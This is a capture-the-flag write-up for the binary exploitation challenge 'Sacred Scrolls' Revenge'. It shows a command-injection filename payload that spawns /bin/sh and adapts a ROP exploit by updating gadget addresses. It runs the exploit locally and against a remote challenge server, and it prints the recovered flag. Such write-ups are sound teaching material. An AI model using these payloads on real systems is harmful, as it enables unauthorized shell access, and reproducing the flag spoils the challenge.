Sacred Scrolls' Revenge

4 minutes to read

This challenge is a fixed version of Sacred Scrolls. Almost all the program behavior is the same as in the previous version, so read that writeup before this one.

They fixed the challenge due to an unintended solution (command injection):

$ ./sacred_scrolls


                                            ▄▞▀▀▀▜▄▖
          ▗     ▖       ▗     ▖       ▗  ▖▟▞▖▘▗▖▚▘ ▝▀▄
   ▖▝  ▘ ▝   ▝    ▝  ▘ ▝   ▝    ▝  ▘ ▝ ▖▌▀ ▖▖▚▘▝▗▝▝ ▗▝▄▖▘ ▘
                                   ▗▗▞▘▚▝▝▝▗▝  ▘   ▖  ▗▚▖
              ▗  ▖  ▗       ▗  ▖▗▄▜▝▚▝▝▖▘▘▝   ▖ ▖ ▘ ▗ ▖▛▞
   ▖  ▖▘ ▖ ▗ ▘         ▖ ▗▝  ▗▄▞▚▗▗▘ ▝           ▖ ▖ ▖▘▀▀▖
                   ▖      ▗▖▛▚▗▝ ▖        ▗ ▝ ▝ ▘ ▖ ▘▗▗▗▝▌
                 ▗    ▗▄▞▀▚▝ ▖          ▖▝  ▖▝ ▖▗ ▖▘▝▗▗▄▞▘
  ▖ ▝     ▗     ▖  ▄▞▀▚▗▝▝  ▖        ▘ ▘ ▗▝ ▖ ▘▗▗▝▖▞▞▌▜▐▐▖
        ▗     ▘▄▖▀▀▗▝▝▗ ▝         ▗ ▘ ▖▖▘▖▝▗ ▚▝▖▖▌▌▌▙▞▌▀
       ▘   ▄▞▞▀▗▝▞▝▖▝           ▘▝  ▖▘▖▖▘▞▝▖▚▚▐▐▟▟▞▘▘
    ▖▝ ▄▖▛▀▖▞▖▌▘▘▝▖      ▖▝ ▗ ▝ ▖▗ ▘▖▖▖▞▐▗▚▚▙▙▛▀▝
   ▄▄▜▚▙▄▄▀▝▗ ▄▝▝▘  ▘ ▘ ▘    ▗ ▖▗ ▝▖▄▐▐▐▟▟▜▜▝             ▘
  ▐▟▛█▜▚▚▚▞▄▖▘     ▖  ▗  ▗ ▘▝ ▖▗▗▐▝▄▟▞▙█▐▝
  ▐▚▛▞▜▚▟ ▝▚▚ ▘▝ ▝  ▝▗ ▖▘ ▗▝▝▖▞▖▌▙▜▙▙▀▘      ▗ ▝     ▗  ▘
  ▜▐▚▐▐▜▟█▖ ▀▙▖▗ ▖▗▝ ▖▗ ▖▘▖▞▞▟▞▛▛▟▀        ▗        ▘     ▖
  ▝▛▗ ▖▌▙▙█▘ ▗▚ ▖▗ ▗▗▗▗▚▐▐▐▞▛▟▞▛▝                ▗▝
   █ ▖▗▀▝▝▛█▗ ▜▘▖▗▝▗▗▚▚▚▙▜▞▙▜▝        ▝  ▘     ▗        ▖
   ▐▖▖ ▚ ▚▜▜▖▞▐▚▗▗▐▗▜▞▛▙▚▙▀         ▝      ▗ ▘        ▗
    ▚▝▖▚▚▖▀▛▞▐▟▚▘▌▌▛▙▜▟▝▘         ▗                  ▗
  ▗ ▝▌▝▖▌▜▚▛▟█▛▙▜▞▛▛▞▘                ▖ ▝        ▖ ▗▝     ▘
     ▝▙▗▐▐▐▜▜▙█▞▟▞▛▝             ▗   ▖    ▗  ▗ ▝
     ▝▘▌▖▖▙▀▙▜▚▜▝             ▗ ▘
        ▝▀▗▀▞▞▘▘      ▝  ▘ ▗▝           ▗               ▝
  ▝ ▝            ▗▝                 ▘      ▝  ▝   ▖▝
                                       ▘              ▝


[+] All ⅀ ℙ ∉ ⎳ ⎳ ⅀ have been whiped out..

Enter your wizard tag: asdf

Interact with magic library asdf

1. Upload ⅀ ℙ ∉ ⎳ ⎳
2. Read   ⅀ ℙ ∉ ⎳ ⎳
2. Cast   ⅀ ℙ ∉ ⎳ ⎳
3. Leave

>> 1

[*] Enter file (it will be named spell.zip): '; /bin/sh; echo '

$ ls
glibc  sacred_scrolls  sacred_scrolls_revenge  solve.py

Trying the previous exploit

Let’s try to run the previous exploit on the updated program:

$ md5sum sacred_scrolls*
33c5fddcfed4332d797e7f2f5d74e75f  sacred_scrolls
c4e656f3ecaa810d7d3e7c83922eff13  sacred_scrolls_revenge

$ cp solve.py solve_revenge.py

$ sed -i s/sacred_scrolls/sacred_scrolls_revenge/g solve_revenge.py

$ python3 solve_revenge.py
[*] './sacred_scrolls_revenge'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'./glibc/'
[+] Starting local process './sacred_scrolls_revenge': pid 3933065
[*] "/bin/sh" address: 0x7fca52de9698
  adding: spell.txt (deflated 54%)
[*] Switching to interactive mode

[-] This spell is not quiet effective, thus it will not be saved!
[*] Got EOF while reading in interactive
$

And it doesn’t work… At least, it seems that the address of "/bin/sh" is still there.

Fixing the exploit

One thing to take into account is that the address of pop rdi; ret and the address of system@plt have probably changed:

$ ROPgadget --binary sacred_scrolls | grep 'pop rdi'
0x0000000000401183 : pop rdi ; ret

$ ROPgadget --binary sacred_scrolls_revenge | grep 'pop rdi'
0x00000000004011b3 : pop rdi ; ret

$ objdump -M intel -d sacred_scrolls | grep system
0000000000400820 <system@plt>:
  400820:       ff 25 6a 27 20 00       jmp    QWORD PTR [rip+0x20276a]        # 602f90 <system@GLIBC_2.2.5>
  400a28:       e8 f3 fd ff ff          call   400820 <system@plt>
  400a34:       e8 e7 fd ff ff          call   400820 <system@plt>
  400c6c:       e8 af fb ff ff          call   400820 <system@plt>
  400cfb:       e8 20 fb ff ff          call   400820 <system@plt>

$ objdump -M intel -d sacred_scrolls_revenge | grep system
0000000000400820 <system@plt>:
  400820:       ff 25 6a 27 20 00       jmp    QWORD PTR [rip+0x20276a]        # 602f90 <system@GLIBC_2.2.5>
  400a28:       e8 f3 fd ff ff          call   400820 <system@plt>
  400a34:       e8 e7 fd ff ff          call   400820 <system@plt>
  400c9a:       e8 81 fb ff ff          call   400820 <system@plt>
  400d29:       e8 f2 fa ff ff          call   400820 <system@plt>

Indeed, the gadget addresses are different. Let’s update this value and run the exploit again:

$ sed -i s/401183/4011b3/g solve_revenge.py

$ python3 solve_revenge.py
[*] './sacred_scrolls_revenge'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'./glibc/'
[+] Starting local process './sacred_scrolls_revenge': pid 3934860
[*] "/bin/sh" address: 0x7f1196b16698
  adding: spell.txt (deflated 54%)
[*] Switching to interactive mode

[-] This spell is not quiet effective, thus it will not be saved!
$ ls
glibc        sacred_scrolls_revenge    solve_revenge.py  spell.zip
sacred_scrolls    solve.py        spell.txt

There we have it.

Flag

So, let’s try remotely:

$ python3 solve_revenge.py 178.62.5.219:32580
[*] './sacred_scrolls_revenge'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'./glibc/'
[+] Opening connection to 178.62.5.219 on port 32580: Done
[*] "/bin/sh" address: 0x7fc46b11f698
updating: spell.txt (deflated 54%)
[*] Switching to interactive mode

[-] This spell is not quiet effective, thus it will not be saved!
$ ls
flag.txt
glibc
sacred_scrolls
spell.txt
spell.zip
$ cat flag.txt
HTB{m4y_th3_b0y_wh0_l1v3d_h3lp_u}